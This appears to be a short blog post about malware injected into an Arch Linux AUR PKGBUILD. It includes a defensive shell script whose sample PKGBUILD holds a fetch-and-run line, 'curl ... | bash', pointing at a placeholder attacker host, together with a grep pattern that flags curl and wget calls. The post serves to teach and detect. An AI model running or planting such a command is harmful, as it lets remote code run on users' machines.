Always read your PKGBUILDs
If you don’t read the PKGBUILD file whenever you download something from the AUR repositories, you are exposing yourself to terrible security issues, as the world has recently seen.
Malware was spotted in the AUR repositories of Arch Linux last week. Someone modified the PKGBUILD of a package to add a curl call to the script, as can be seen here (for as long as the blob object is not purged from the repository, since the commit itself was already stripped from the history).
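The pattern that incident relied on is a download tool being invoked from inside a PKGBUILD function, rather than the file being listed in the `source=()` array where makepkg downloads and checksums it. As an added example (not code from the post or from Arch), here is a small pre-build check that flags curl or wget invocations inside a PKGBUILD; the sample PKGBUILD, its package name and the URLs in it are constructed placeholders.

```shell
#!/bin/sh
# Added example: flag curl/wget calls made from inside a PKGBUILD's
# shell functions. Files listed in source=() are fetched and checksummed
# by makepkg; a curl inside prepare()/build()/package() bypasses that.

# Constructed sample PKGBUILD (placeholder names and URLs). The curl line
# mimics the kind of injected command the post describes.
SAMPLE_PKGBUILD=$(mktemp)
cat > "$SAMPLE_PKGBUILD" <<'EOF'
pkgname=example-pkg
pkgver=1.0
pkgrel=1
arch=('any')
source=("https://example.invalid/example-pkg-1.0.tar.gz")
sha256sums=('SKIP')

package() {
    install -Dm644 README "$pkgdir/usr/share/doc/$pkgname/README"
    curl -s https://attacker.invalid/x | bash   # injected: fetch and run remote code
}
EOF

# A clean copy of the same PKGBUILD, with the injected line removed.
CLEAN_PKGBUILD=$(mktemp)
grep -v 'curl' "$SAMPLE_PKGBUILD" > "$CLEAN_PKGBUILD"

# flag_network_calls FILE
# Prints each line (with its number) where curl or wget appears as a
# command, skipping comment lines and the source=()/checksum arrays.
# Returns 1 if anything was flagged so it can gate a build, 0 otherwise.
flag_network_calls() {
    _hits=$(grep -nE '(^|[[:space:];|&(])(curl|wget)([[:space:]]|$)' "$1" \
            | grep -vE '^[0-9]+:[[:space:]]*#' \
            | grep -vE '^[0-9]+:[[:space:]]*(source|sha256sums|md5sums|b2sums)=' \
            || true)
    if [ -n "$_hits" ]; then
        printf '%s: download tool invoked inside PKGBUILD:\n%s\n' "$1" "$_hits"
        return 1
    fi
    return 0
}

# Demonstration: the injected file is flagged, the clean copy passes.
if flag_network_calls "$SAMPLE_PKGBUILD"; then
    echo "sample: clean (unexpected)"
else
    echo "sample: flagged, do not build"
fi
if flag_network_calls "$CLEAN_PKGBUILD"; then
    echo "clean copy: no download tools found"
fi
```

Run it against the PKGBUILD in a cloned AUR checkout before `makepkg`; a hit is a reason to open the file and read the function, not proof of malice, since a few packages do legitimately shell out to download tools. The check is deliberately a grep over the raw text, so it also catches calls hidden in helper functions that makepkg would not execute until build time.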
I would file this tip in the same category as “don’t just curl | bash stuff you find on GitHub”, but it’s getting late and I don’t have time to enter the rabbit-hole argument of where we put the limit on trusting the software and the installers we put on our machines.